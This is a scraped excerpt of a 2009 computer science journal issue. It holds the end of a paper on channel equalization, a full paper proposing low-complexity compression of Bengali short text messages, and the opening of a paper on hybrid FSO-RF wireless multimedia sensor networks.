up to bandwidths corresponding to the WCDMA bandwidthof 5MHz [7]. However, if the transmission bandwidth isfurther increased up to, for example 20 MHz, which is thetarget for the 3GPP Long-Term Evolution, the complexity of straightforward high-performance equalization starts to become a serious issue. One option is then to apply less
optimal equalization, with a corresponding negative impact onthe equalizer capability to counteract the signal corruption due
to radio-channel frequency selectivity and thus acorresponding negative impact on the radio-link performance.The use of specific single-carrier transmission schemes,especially designed to allow for efficient but still reasonably
low-complexity equalization.Linear time-domain (frequency-domain) filtering/equalization
implies that linear processing is applied to signals received at
different time instances (different frequencies) with a target tomaximize the post-equalizer SNR (MRC-based equalization),alternatively to suppress signal corruption due to radio-
channel frequency selectivity (zero-forcing equalization,MMSE equalization, etc.).
7. CONCLUSION
Of particular interest today is the area of digital cellular communications, which has seen wide use of fixed-pointDSPs. DSP-based equalizer systems have become ubiquitous
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 102/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
in many diverse applications including voice, data, and videocommunications via various transmission media. Typicalapplications range from acoustic echo cancelers for full-
duplex speakerphones to video echo-canceling systems for terrestrial television broadcasts to signal conditioners for
wireline modems and wireless telephony.
The effect of an equalization system is to compensate for transmission-channel impairments such as frequency-
dependent phase and amplitude distortion. Besides correctingfor channel frequency-response anomalies, the equalizer can
cancel the effects of multipath signal components, which canmanifest themselves in the form of voice echoes, video ghostsor Rayleigh fading conditions in mobile communicationschannels. Equalizers specifically designed for multipathcorrection are often termed echo-cancelers. They may requiresignificantly longer filter spans than simple spectral equalizers,
but the principles of operation are essentially the same.
This article attempts to familiarize you with some basicconcepts associated with channel equalization and datacommunication in general. This report is intended to give anintroduction to equalization, their types and examples and
applications in digital transmission. We have provided a brief survey of equalization techniques and describe their characteristics using some examples. Baseband and Passbandequalization has been discussed in terms of Multiphase QPSK.Some Matlab driven examples also shown using plot to better understand.
REFERENCES
[1]. B. P. Lathi, Modern Digital and Analog
Communication Systems, Third Edition: OxfordUniversity Press, 1998.
[2]. Ziemer, R.E., and Peterson, R.L., Introduction to
Digital Communication, Second Edition, Prentice Hall,2001.
[3]. J. Kurzweil, An Introduction to Digital
Communications, John Wiley, 2000.[4]. TMS320C5x User’s Guide, Texas Instruments, 1993.[5]. GSM Introduction WL9001student guide Lucent
Technologies, 1998.[6]. J.G. Proakis, Digital Communications, McGraw-Hill,
New York, 2001.[7]. G. Bottomley, T. Ottosson and Y.-P. Eric Wang, ‘A
Generalized RAKE Receiver for InterferenceSuppression’, IEEE Journal on Selected Areas in
Communications, Vol. 18, No. 8, August 2000, pp.1536–1545.
[8]. Qureshi, S.,“Adaptive Equalization”, IEEE
Communications Magazine, March 1992, pp. 9–16.
[9]. Peebles, P.Z. , Communication System Principles
Addison-Wesley, 1976.[10]. Samueli, H., Daneshrad, B., Joshi, R., Wong, B., and
Nicholas, H., “A 64-Tap CMOS EcCanceller/Decision Feedback Equalizer for 2B1Q
HDSL Transceivers”, IEEE Journal onSelected Areasin Communications, Vol. 9, Iss: 6 , August 1991, pp.839–847.
AUTHORS PROFILE
Kazi Mohammed Saidul Huq received B.Sc. in CSE fromAhsanullah University of Science & Technology, Bangladeshin 2003. He obtained his M.Sc. in EE - specializationTelecommunications from Blekinge Institute of Technology,
Sweden in 2006. Since April 2008, he started working atInstituto de Telecomunicações, Pólo de Aveiro, Portugal. Hisresearch activities include integration of heterogeneous
wireless systems (in CRRM, cross-layer design, DBWS &system level simulation paradigm) and integration of RFID.
Atílio Gameiro received his Licenciatura (five years course)and his PhD from the University of Aveiro in 1985 and 1993respectively. He is currently a Professor in the Department of
Electronics and Telecommunications of the University of Aveiro, and a researcher at the Instituto de Telecomunicações- Pólo de Aveiro, where he is head of group. His maininterests lie in signal processing techniques for digital
communications and communication protocols. Within thisresearch line he has done work for optical and mobilecommunications, either at the theoretical and experimental
level, and has published over 100 technical papers inInternational Journals and conferences. His current researchactivities involve space-time-frequency algorithms for the broadband component of 4G systems and joint design oflayers 1 and 2.
Md. Taslim Arefin received B.Sc. in Computer Engineering
from American International University –Bangladesh (AIUB)in 2005. He obtained his M.Sc. in Electrical Engineering – Specialization Telecommunications from Blekinge Institute of
Technology (BTH), Sweden in 2008 . At the present time heis working as lecturer in the Dept. of Computer Science &Engineering at University of Development Alternative
(UODA), Dhaka, Bangladesh from January, 2009. Hisresearch interest includes BSS, communication engineeringand computer networking like development over cellular network, routing related issue and wireless communicationetc.
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 103/215
AN ENHANCED STATIC DATA COMPRESSION SCHEME
OF BENGALI SHORT MESSAGE
Abu Shamim Mohammad Arif
Assistant Professor,
Computer Science & EngineeringDiscipline,
Khulna University,
Khulna, BangladeshE-mail: shamimarif@yahoo.com
Asif Mahamud
Computer Science & EngineeringDiscipline,
Khulna University,
Khulna, Bangladesh.E-mail: asif.cse04@gmail.com
Rashedul Islam
Computer Science & Engineering
Discipline,Khulna University,
Khulna, Bangladesh.
E-mail: rashedrst@yahoo.com
Abstract—This paper concerns a modified approach of compressing Short Bengali Text Message for small devices. Theprime objective of this research technique is to establish a low-complexity compression scheme suitable for small devices havingsmall memory and relatively lower processing speed. The basic
aim is not to compress text of any size up to its maximum levelwithout having any constraint on space and time; rather than themain target is to compress short messages up to an optimal levelwhich needs minimum space, consume less time and theprocessor requirement is lower. We have implemented CharacterMasking, Dictionary Matching, Associative rule of data miningand Hyphenation algorithm for syllable based compression inhierarchical steps to achieve low complexity lossless compressionof text message for any mobile devices. The scheme to choose thediagrams are performed on the basis of extensive statisticalmodel and the static Huffman coding is done through the samecontext.
I. INTRODUCTION
We are now at the age of science. Now a day, Science brings everything to the door of us. Science makes life easywith its many renowned and unrenowned achievements. Smalldevices are one of such achievements. In case of our personalcomputer there is much space to store various types of data. Wenever worried about how much space the data or messages takeinto the memory to store that data. But in case of small devicewe have to consider the memory space required to store therespective data or text messages. Compression of the textmessage is the number one technique in this case.
Compression is an art of reducing the size of a file byremoving redundancy in its structure. Data Compression offersan attractive approach of reducing communication costs byusing available bandwidth effectively. Data Compressiontechnique can be divided into two main categories namely for Lossless Data Compression and Lossy Data Compression. If the recovery of data is exact then the compression algorithmsare called Lossless. This type of lossless compressionalgorithms are used for all kinds of text, scientific andstatistical databases, medical and biological images and so on.The main usage of Lossy Data Compression is in normal imagecompression and in multimedia compression. Our aim is to
develop a Lossless Compression technique for compressingshort message for small devices.
It is necessary to clearly mention here that compression for small devices may not be the ultimate and maximum
compression. It is because of the case that in order to ensurecompression in the maximum level we definitely need to useand implement algorithms sacrificing space and time. But thesetwo are the basic limitations for any kind of mobile devicesespecially cellular phones. Thus we are to be concerned onsuch techniques suitable to compress data in the most smart andefficient way from the point of view of low space and relativelyslower performance facility and which is not require higher
processor configuration.
The basic objective of the thesis is to implement acompression technique suitable for small devices to facilitate tostore text messages by compressing it up to a certain level.More precisely saying- Firstly, to achieve a technique which is
simple and better to store data in a small device. Secondly, tokeep required compression space minimum in order to copewith memory of small devices. Thirdly, to have thecompression time optimal and sustainable.
II. LITERATURE SURVEY
A. Definitions
Data Compression In computer science and information theory, data
compression often referred to as source coding is the process of encoding information using fewer bits (or other information-
bearing units) than an un-encoded representation would usethrough use of specific encoding schemes. One popular instance of compression that many computer users are familiar with is the ZIP file format, which, as well as providingcompression, acts as an achiever, storing many files in a singleoutput file.
As is the case with any form of communication,compressed data communication only works when both thesender and receiver of the information understand the encodingscheme. For example, this text makes sense only if the receiver understands that it is intended to be interpreted as characters
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550097
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 104/215
representing the English language. Similarly, compressed datacan only be understood if the decoding method is known by thereceiver. Some compression algorithms exploit this property inorder to encrypt data during the compression process so thatdecompression can only be achieved by an authorized party(eg. through the use of a password). [9]
Compression is useful because it helps reduce theconsumption of expensive resources, such as disk space or
transmission bandwidth. On the downside, compressed datamust be uncompressed to be viewed (or heard), and this extra
processing may be detrimental to some applications. For instance, a compression scheme for text requires mechanismfor the text to be decompressed fast enough to be viewed as it's
being decompressed and may even require extra temporaryspace to decompress the text. The design of data compressionschemes therefore involve trade-offs between various factors,including the degree of compression, the amount of distortionintroduced (if using a lossy compression scheme), and thecomputational resources required to compress and uncompressthe data.
Short Message
A message in its most general meaning is an object of communication. It is something which provides information; itcan also be this information itself [9]. Therefore, its meaning isdependent upon the context in which it is used; the term mayapply to both the information and its form. A communiqué is a
brief report or statement released by a public agency. [9]
Short Text Message
Text Messaging, also called SMS (Short Message Service)allows short text messages to be received and displayed on the
phone. 2-Way Text Messaging, also called MO-SMS (Mobile-Originated Short Message Service,) allows messages to be sentfrom the phone as well.[9] Text messaging implies sendingshort messages generally no more than a couple of hundred
characters in length. The term is usually applied to messagingthat takes place between two or more mobile devices
Existing Methods and Systems for Lossless DataCompression
Though a number of researches have been performedregarding data compression, in the specific field of SMSCompression the number of available research works is nothuge. The remarkable subject is that all the compressiontechnique is for other languages but not for Bengali. Thetechniques are mainly for English, Chinese, and Arabic etc.Bengali differs from these languages for its distinct symboland conjunct letters. So, we have to gather knowledge fromthe other language compression technique and then had to gofor our respective compression. The following two sectionsgive a glimpse of the most recent research developments onSMS Compression issue.
Efficient Data Compression Scheme using Dynamic Huffman Code Applied on Arabic Language [1]
This method is proposed by Sameh et al. In addition to thecategorization of data compression schemes with respect tomessage and codeword lengths, these methods are classified as
either static or dynamic. A static method is one in which themapping from the set of messages to the set of code-words isfixed before transmission begins, so that a given message isrepresented by the same codeword every time it appears in themessage ensemble. The classic static defined-word scheme isHuffman coding. In Huffman coding, the assignment of code-words to source messages is based on the probabilities withwhich the source messages appear in the message ensemble.Messages which appear more frequently are represented byshort code-words; messages with smaller probabilities map tolonger code-words. These probabilities are determined beforetransmission begins. A code is dynamic if the mapping fromthe set of messages to the set of code-words changes over time. For example, dynamic Huffman coding involvescomputing an approximation to the probabilities of occurrence"on the fly", as the ensemble is being transmitted. Theassignment of code-words to messages is based on the valuesof the relative frequencies of occurrence at each point in time.A message x may be represented by a short codeword early inthe transmission because it occurs frequently at the beginningof the ensemble, even though its probability of occurrenceover the total ensemble is low. Later, when the more probablemessages begin to occur with higher frequency, the shortcodeword will be mapped to one of the higher probabilitymessages and x will be mapped to a longer codeword. Thereare two methods to represent data before transmission: FixedLength Code and Variable length Code.
The Huffman coding algorithm produces an optimalvariable length prefix code for a given alphabet in whichfrequencies are pre assigned to each letter in the alphabet.Symbols that occur more frequently have shorter Code wordsthan symbols that occur less frequently. The two symbols thatoccur least frequently will have the same codeword length.Entropy is a measure of the information content of data. Theentropy of the data will specify the amount of lossless datacompression can be achieved. However, finding the entropy of
data sets is non trivial. We have to notice that there is nounique Huffman code because Assigning 0 and 1 to the
branches is arbitrary and if there are more nodes with the same probability, it doesn’t matter how they are connected
The average message length as a measure of efficiency of the code has been adopted in this work.
The average search length of the massage is thesummation of the multiplication of the length of code-wordand its probability of occurrence.
Also the compression ratio as a measure of efficiency has been used.
Comp. Ratio = Compressed file size / source file size * 100 %
The task of compression consists of two components, anencoding algorithm that takes a message and generates a“compressed” representation (hopefully with fewer bits) and adecoding algorithm that reconstructs the original message or some approximation of it from the compressed representation.
Genetic Algorithms in Syllable-Based Text Compression [2]
This method is proposed by Tomas Kuthan and Jan Lansky.
To perform syllable-based compression, a procedure is needed
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550098
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 105/215
for decomposition into syllables. They call an algorithmhyphenation algorithm if, whenever given a word of alanguage, it returns it’s decomposition into syllables.According to the definition of syllable every two differenthyphenation of the same word always contain the samenumber of syllables. There can be an algorithm that works as ahyphenation algorithm for every language. Then it is calleduniversal hyphenation algorithm. Otherwise it is calledspecific hyphenation algorithm. They describe four universalhyphenation algorithms: universal left PU L, universal right PU
R , universal middle-left PU M L and universal middle-right PU M
R .
The first phase of all these algorithms is the same. Firstly,they decompose the given text into words and for each wordmark its consonants and vowels. Then all the maximalsubsequences of vowel are determined. These blocks form theground of the syllables. All the consonants before the first
block belong to the first syllable and those behind the last block will belong to the last syllable.
This algorithm differs in the way they redistribute the inner groups of consonants between the two adjusting vowel blocks.
PU L puts all the consonants to the preceding block and PU R puts them all to the subsequent block. PU M L and PU M R try toredistribute the consonant block equally. If their number is oddPU M L pushes the bigger parity to the left, while PU M R to theright. The only exception is, when PU M L deals with a one-element group of consonants. It puts the only consonant to theright to avoid creation of not so common syllables beginningwith a vowel.
Hyphenating priesthood
correct hyphenation priest-hooduniversal left PU L priesth-ooduniversal right PU R prie-sthooduniversal middle-left PU M L priest-hood
universal middle-right PU M R pries-thood Effectiveness of these algorithms is then measured. In
general, PU L was the worst one; it had lowest number of correct hyphenations and produced largest sets of uniquesyllables. The main reason for this is that it generates a lot of vowel-started syllables, which are not very common. PU R was
better but the most successful were both ’middle’ versions.English documents were best hyphenated by PU M R , while withCzech texts PU M L was slightly better.
Lossless Compression of Short English Text Message for JAVA Enable Mobile Devices [3]
This method is proposed by Rafiqul et al. published in
preceedings of 11th International Conference on Computer and Information Technology (ICCIT 2008), in December,2008, Dhaka, Bangladesh. The Total compression process isdivided into three steps namely for Character Masking,Substring Substitution or Dictionary Matching or PartialCoding, Bit Mapping or Encoding (Using Fixed ModifiedHuffman Coding).
The very first step of planned SMS Compression isCharacter Masking. Character Masking is a process in whichthe character(s) code(s) are changed or re-defined on the basis
of any specific criteria. In concerned task it is planned to usecharacter masking for reducing the storage overhead for blank spaces. Firstly the spaces are expected to be searched out andthen encoded by a predefined code-word. This codewordshould be unique for the overall compression. For multipleconsecutive blank spaces the same technique may beemployed. The modified message is then passed towards thenext compression step for dictionary Matching or PartialCoding.
In the second step they employ Dictionary Matching or Partial Coding. In this phase the string referred from the firststep is passed through a partial coding which encodes themasked characters (performed previously in the first step) onthe basis of the following character. The character followingmasked character mergers the masked space by encoding it.Thus all the spaces are merged and as a result it may becertainly reduce a mentionable amount of characters. After this task we pass the modified string of message through adictionary matching scheme where the message is searched for matching some pre-defined most-commonly used words or substrings or punctuations to reduce the total number of characters. The message is then forwarded to Step 3 where the
actual coding is performed.
In the final step of coding they have used static HuffmanCoding Style. But here the modification is made that in spiteof calculating on-stage codes they use predefined codes inorder to reduce the space and time complexity. The codes for dictionary entries are also predefined. The total message isthus encoded by a comparatively small number of bits andhence they get a compressed outcome.
Compression of a Chinese Text [4]
This method is proposed by Phil Vines, Justin Zobel. Inthis method, the byte oriented version of PPM (PartialPredictive Matching) is not predicting characters, but rather
halves of character. It is reasonable to suppose that modifyingPPM to deal with 16 bit characters should enable the model tomore accurately capture the structure of the language andhence provide better compression .They have identifiedseveral changes that need to be made to the PPMimplementation described above to allow effective 16-bitcoding of Chinese. First, the halving limit needs to bemodified the number of 16-bit characters that can be occur in acontext in much greater than of 4-bit characters. So a large
probability space is required. Second, in conjunction with thischange the increment should also be increased to force morefrequent halving and prevent the model from stagnating. Their experiments suggest that a halving limit of 1024 and anincrement of 16 are appropriate. Third, the method described
above for estimating escape probabilities may not beappropriate since so many characters are novel. Fourth, modelorder must be chosen.
Most implements encode bytes, but this is an arbitrarychoice and any unit can be used within the constraints of memory size and model order. For English contexts andsymbols are quickly repeated, so that, after only a fewkilobytes of text, good compression is achieved and contextsof as little as three characters can give excellent compression.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550099
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 106/215
As byte-oriented PPM is a general method that gives goodresults not only for English text but for a wide variety of datatypes, an obvious option is to apply it directly to Chinese text.Higher order models take a loner time to accumulate contextswith probabilities that accurately reflect the distribution. Sothat, when memory is limited, the models spends most of itstime in the learning phase, where it emits large number of escape codes and is unable to make . Thus they observe poorer compression because such contexts do not reappear sufficiently often before the model needs to be flushed andrebuild over 800. Reloading the model with immediate prior text after each flush is unlikely to helpful; since the problem isthat there is not sufficient memory to hold the model thatmake accurate prediction. It follows that increasing theamount of memory available for storing contexts could beexpected to improve compression performance. However,assuming only moderate volumes of memory are available,managing even a character-based model can be problematic;they believe that because of the number of distinct symbols,use of a word-based model is unlikely to be valuable. Theimplementation of PPM described above uses a simplememory management strategy; all information is discardedwhen the available space is consumed.
III. PROPOSED SYSTEM
Our prime concern of thesis is to implement a losslesscompression of short Bengali text for low-powered devices in alow complexity scheme. The idea behind this is there are stillmany compression techniques for languages like English,Arabic and other language and many people are still involvingto improve the compression ratio of messages of the respectivelanguage. Some of them are also published in variousconferences and journals. Although Bengali short messagetechnique is achieved couple of years ago but there is not stillany compression technique suitable for Bengali languages.
Bengali text compression differs from English textcompression from mainly two points of views. Firstly, thecompression techniques involving pseudo-coding of uppercase(or lowercase) letters are not applicable for Bengali text.Secondly, in case of Bengali, we may employ specificmechanism of coding dependent vowel signs to removeredundancy, which is absent for the case of English. In Bengali,we have 91 distinct symbol units including independentvowels, constants, dependent vowel signs, two partindependent vowel signs, additional constants, various signs,additional signs and Bengali numerals etc. A detail of Bengalisymbols available in. Moreover, in Bengali we have a largeinvolvement of conjuncts which also focuses a scope of redundancy removal.
Though English has got a fixed encoding base long ago,still now in practical application, Bengali has adapted uniqueencoding scheme. The use of Bengali Unicode has not yet got amassive use. This is really a great limitation for research inBengali. Bengali text compression also suffers from the same
problem.
A. Compression Process
In this paper, we propose a new dictionary based
compression technique for Bengali text compression. Tofacilitate efficient searching and low complex coding of thesource text, we employ term probability of occurringcharacters and group of characters in a message with indexingthe dictionary entries. The total compression scheme isdivided into two stages:
Stage 1: Building the knowledge-base.
Stage 2: Apply proposed text ranking approach for compression the source text.
Stage 1: Building the knowledge-base
The test-bed is formed from the standard Bengali textcollections from various sources. We consider a collection of texts of various categories and themes (like news, documents,
papers, essays, poems and advertising documents) as the test bed. By reading the respective frequency statistics we selectour respective knowledgebase entries and divide the frequencyinto a four level architecture. Assigning minimum lengthcode-words to the selected components is the main objectiveof the statistics gathering phase. It is remarkable that, though afew collections of domain specific text collection are
available, still now no sophisticated Bengali text compressionevaluation test-bed is available. As data compression andespecially dictionary based text compression greatly involvesthe structure, wording and context of texts, a collectioninvolving different types of text is a must for evaluating thecompression. In constructing the dictionary, we use the test-text-bed of 109 files varying from 4kb to 1800kb.
The Variable Length Coding (VLC) algorithm [1] is used to produce an optimal variable length prefix code for a givenalphabet. Noteworthy that, in the previous step of knowledgebase formation, frequencies is already pre-assignedto each letter in the alphabet. Symbols that occur morefrequently have shorter Code-words than symbols that occur
less frequently. The two symbols that occur least frequentlywill have the same codeword length. Entropy is a measure of the information content of data. The entropy of the data willspecify the amount of lossless data compression can beachieved. However, finding the entropy of data sets is nontrivial. We have to notice that there is no unique Huffman code
because Assigning 0 and 1 to the branches is arbitrary and if there are more nodes with the same probability, it doesn’tmatter how they are connected.
The average message length as a measure of efficiency of the code has been adopted in this work.
Avg L = L1 * P (1) + L2 * P (2) + ….. + Li * P (i)
Avg L = ∑ Li * P (i)
Also the compression ratio as a measure of efficiency has been used.
Compression Ratio = Compressed file size / source filesize * 100 %
The task of compression consists of two components, anencoding algorithm that takes a message and generates a“compressed” representation (hopefully with fewer bits) anda decoding algorithm that reconstructs the original message
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500100
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 107/215
or some approximation of it from the compressedrepresentation.
Stage 2: Apply proposed text ranking approach forcompression the source text
Text ranking is an elementary scheme which is used to assignweights or index of texts or terms (especially word tokens) onthe basis of any suitable scheme or criteria. This scheme of
indexing or ranking is ideally frequency of occurrence of thetexts or even probability of occurrence of the texts or components. In our method, we grab the source text and takethe Unicode value of the corresponding data. Our method of compression process differs mainly from others in this point.Still now no one has the method of taking the mostsuccessive match. But we have the way to take the mostsuccessive match. We will start with maximum level and
proceed through the hierarchical levels to find successfulmatch. It is to remark that in the last level there is only lettersand their Unicode value. So, if a word does not match in anylevel it has to match in this level. To perform compression,we need a procedure for decomposition into syllables. Wewill call an algorithm hyphenation algorithm [2] if, whenever
given a word of a language, it returns it’s decomposition intosyllables. It is called universal hyphenation algorithm. By thisalgorithm we can generate the successful match for a stringor sentence what other method haven’t done. We call thisalgorithm as specific hyphenation algorithm. We will usefour universal hyphenation algorithms:
universal left PU L,
universal right PU R ,
universal middle-left PU M L and
universal middle-right PU M R .
The first phase of all these algorithms is the same. Firstly,
we decompose the given text into words and for each wordmark its letter and symbol. Then we determine all themaximal subsequences of vowel. These blocks form theground of the syllables. All the consonants before the first
block belong to the first syllable and those behind the last block will belong to the last syllable.
After taking the most successive matching then encodewith the code-words obtained in the Step 1 for each matchingelements. And lastly the resultant data will be transmitted.
B. Decompression Process
The total decompression process can be divided into thefollowing three steps:
Step 1: Grab the bit representation of the message
Step 2: Identify the character representation
Step 3: Display the decoded message.
As all the letters and symbols are to be coded in such afashion that by looking ahead several symbols (Typically themaximum length of the code) we can distinguish eachcharacter (with attribute of Human Coding).
In step 1 the bit representation of the modified message is
performed. It is simply analyzing the bitmaps.
The second step involves recognition of each separate bit- patterns and indication of the characters or symbols indicated by each bit pattern. This recognition is performed on the basisof the information from fixed encoding table used at the timeof encoding.
The final step involves simply representing i.e. display of
the characters recognized through decoding the receivedencoded message.
IV. EXPERIMENT RESULT
The proposed model of short text Compression for Bengalilanguage provides much more efficiency than other SMScompression models. This proposed model is also expected tohave lower complexity than that of the remaining models. Thesteps provided are not previously implemented in same model.The basic aspect of the model is, in this model we plan to useless than eight bit codeword for each character in averageusing static coding in place of eight bits and hence we mayeasily reduce total number of bits required in general torepresent or transmit the message. The modification is
required and to some extent essential because for lowcomplexity devices is not any intelligent approach to calculatethe codes for each character sacrificing time and spacerequirements. That is why it may be a good approach to
predefine the codes for each character having less bit length intotal to compress the message. The fixed codes will bedetermined from the heuristic values based on the dictionarywe normally use. The ultimate aim is to use less number of
bits to reduce the load of characters.
We intend to apply the dictionary matching or multi-gramsmethod to enhance the optimality of compression. Multi-grams method is used in order to replace a number of usedsub-string or even strings from the input message. Specific
code words are defined for those words or substrings or strings. It is because the case that if we can replace any part of the message by a single characters then we can definitelyreduce the total number of character gradually. It is necessaryto mention here that the co-ordination of multi-grams or dictionary method with modified Huffman coding may ensurethe maximum 3 to 5 possible compression. In order to enhancethe performance of compression the dictionary matching or multi-grams will play a vital role in compression ratio becausethe propose thesis is based on successful and ultimate optimalcompression of Bengali text at the level best for wirelessmobile devices with small memory and lower performancespeed. As we are using Huffman coding for length sevenwhereas each character requires eight bits to be represented.
Thus for n characters we will be able to compress n bits usingfixed Huffman coding. In the next step we will be able to savethe memory requirements for blank spaces using character masking. For example, for any Bengali short message of length 200 characters it is usual to predict that we may have atleast 25 spaces. If we can eliminate those blank spaces bymasking with its consecutive character through character masking, then we may reduce those 25 characters from theoriginal message. It is necessary to mention here that thedictionary matching or multi-grams method is completely
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500101
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 108/215
dependent on the probability distribution of input message andwe are to be much more careful on choosing the dictionaryentries for Bengali text.
The implementation of the compression scheme is performed using JAVA 2 Micro Edition with the simulationusing Java-2 SE 1.5. The cellular phones adapting the
proposed Compression tool must be JAVA powered. Theimplementation will include both encoding and decoding
mechanism.
A. Discussions on Results
The performance evaluation is performed on the basis of the various corpuses. As the prime aspect of our proposedCompression Scheme is not to compress huge amount of textrather to compress texts with limited size affordable by 36 themobile devices i.e. embedded systems, we took blocks of textsless than one thousand characters chosen randomly from thosefiles ignoring binary files and other Corpus files and
performed the efficiency evaluation.
The most recent study involving compression of text dataare-
1. “Arabic Text Steganography using multiple diacritics” by Adnan Abdul-Aziz Gutub, Yousef Salem Elarian, SamehMohammad Awaideh, Aleem Khalid Alvi. [1]
2. “Lossless Compression of Short English Text Messagefor JAVA enables mobile devices” by “Md. Rafiqul Islam, S.A. Ahsan Rajon, Anondo Poddar. [2]
We denote the above two methods as DCM-1 and DCM-2respectively.
The simulation was performed in a 2.0 GHz PersonalComputer with 128 MB of RAM in threading enable platform.The result for different size of blocks of text is as follows-
Source DCM-1 DCM-2 Proposed Technique
Prothom Alo 4.24 4.01 3.98
Vorer Kagoj 3.78 4.19 3.98
Amader somoy 4.02 4.08 3.93
Ekushe-khul.poem 4.98 3.98 3.65
Ekushe-
khul.Article4.48 3.79 3.44
0
0.5
1
1.5
2
2.5
33.5
4
4.5
5
C O M P R E S S I O N
R A T I O
DCM-1 DCM-2 PROPOSED
SCHEMES
COMPRESSION RATIOCOMPARISON
PROTHOM ALO VORER KAGOJ AMADER SOMOY
Ekushe-khul. POEM Ekushe-khul. Article
V. CONCLUSION
The prime objective of this undergraduate research is todevelop a more convenient low complexity compressiontechnique for small devices. As the environment is completelydifferent from the usual one (PCs with huge memory andamazingly greater performance speed) and the challenge is to
cope with the low memory and relatively less processing speedof the cellular phones, the ultimate objective is to devise a wayto compress text messages in a smart fashion to ensure optimalrate and efficiency for the mobile phones which may not be the
best approach for other large-scale computing devices. That iswhy, in comparison to other ordinary data compressionschemes the proposed is of low complexity and less timeconsuming.
REFERENCES
[1] Sameh Ghwanmeh,Riyad Al-Shalabi and Ghassan Kanaan “EfficientData Compression Scheme using Dynamic Huffman code Applied onArabic Language” Journal of Computer Science,2006
[2] Tomas Kuthan and Jan Lansky “Genetic algorithms in syllable based
text compression” Dateso 2007.
[3] Md. Rafiqul Islam, S.A.Ahsan Rajon, Anondo Poddar “LosslessCompression of Short English Text Message for JAVA enable mobiledevices” Published in Proceedings of 11th International Conference on
Computer and Information Technology (ICCIT 2008) 25-27 December,2008, Khulna, Bangladesh.
[4] Phil Vines,Justin Zobel, “Compression of Chinese Text” Journal title:software practice and experience,1998.
[5] www.maximumcompression.com Data Compression Theory and Algorithms Retrieved/visited on August 10, 2009.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500102
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 109/215
[6] Khair Md. Yeasir Arafat Majumder, Md. Zahurul Islam, and Majuzmder Khan, “Analysis of and Observations from a Bangla News Corpus”,Proceedings of 9th International Conference on Computer andInformation technology ICCIT 2006, pp. 520-525, 2006.
[7] N. S. Dash, “Corpus Linguistics and Language Technology”, 2005.
[8] Leonid Peshkin, “Structure Induction By Lossless Graph Compression”.2007 Data compression Conference (DCC’07).
[9] www.datacompression.com Theory of Data Compression
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500103
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 110/215
QoS Provisioning Using Hybrid FSO-RF Based Hierarchical Model for Wireless
Multimedia Sensor Networks
Saad Ahmad Khan , Sheheryar Ali Arshad
Department of Electrical Engineering,
University Of Engineering & Technology, Lahore
Pakistan, 54890
Email: saad.ahmad@uet.edu.pk; s.ali@uet.edu.pk
Abstract - Our objective is to provide guaranteed packet delivery
service in time constrained sensor networks. The wireless
network is a highly variable environment, where available link
bandwidth may vary with network load. Since multimedia
applications require higher bandwidth so we use FSO links for
their transmission. The main advantage of FSO links is that theyoffer higher bandwidth and security, while RF links offer more
reliability. The routing in this multi-tier network is based on
directional geographic routing protocol, in which sensors route
their data via multi-hop paths, to a powerful base station,
through a cluster head. Some modifications have also been
incorporated in the MAC layer to improve the QoS of such
systems.
Index Terms — Wireless Multimedia Sensor Networks; Visual
Sensor Network; Hybrid RF-FSO; QoS Provisioning;
Hierarchical Sensor Network Model .
I. INTRODUCTION
RECENT advancement in field of sensor networks show thatthere has been increased interest in the development
multimedia sensor network which consists of sensor nodes
that can communicate via free space optics (FSO) or RF. A
wireless multimedia sensor network typically consists of two
types of sensor nodes. One of these acts as data sensing nodes
with sensors like acoustic sensors or seismic sensors etc. The
other nodes are the video sensor nodes which capture videos
of event of interest.
Multimedia contents, especially video streams, require
transmission bandwidth that is orders of magnitude higher
than that supported by current off-the-shelf sensors. Hence,
high data rate and low-power, consumption-transmission
techniques must be leveraged. In this respect, free space optics
seems particularly promising for multimedia applications.
FSO refers to the transmission of modulated visible or infrared
(IR) beams through the atmosphere to obtain broadband
communications over distances of several kilometers. The
main limitation of FSO is the requirement that a direct line-of-
sight path exist between a sender and a receiver. However
FSO networks offer several unique advantages over RF
networks. These include the fact that FSO avoids interference
with existing RF communications infrastructure [1], is cheaply
deployed since there is no government licensing of scarce
spectrum required, is not susceptible to “jamming” attacks,
and provides a convenient bridge between the sensor network
and the nearest optical fiber. In addition, “well-designed” FSOsystems are eye safe, consumes less power and yields smaller
sized nodes because a simple baseband analog and digital
circuitry is required, in contrast to RF communication. More
importantly, FSO networks enable high bandwidth burst
traffic which makes it possible to support multimedia sensornetworks [1].
Class Application Bandwidth
(b/s)
Delay
bound
(ms)
Loss
Rate
Non-real
time
variable bit
rate
DigitalVideo
1M – 10M Large 10-6
Available
Bit Rate
WebBrowsing
1M - 10M Large 10-8
Unspecified
Bit Rate
File Transfer 1M - 10M Large 10-8
Constant BitRate
Voice 32 k – 2M 30-60 10-2
Real time
Variable Bit
Rate
VideoConference
128k - 6M 40-90 10-3
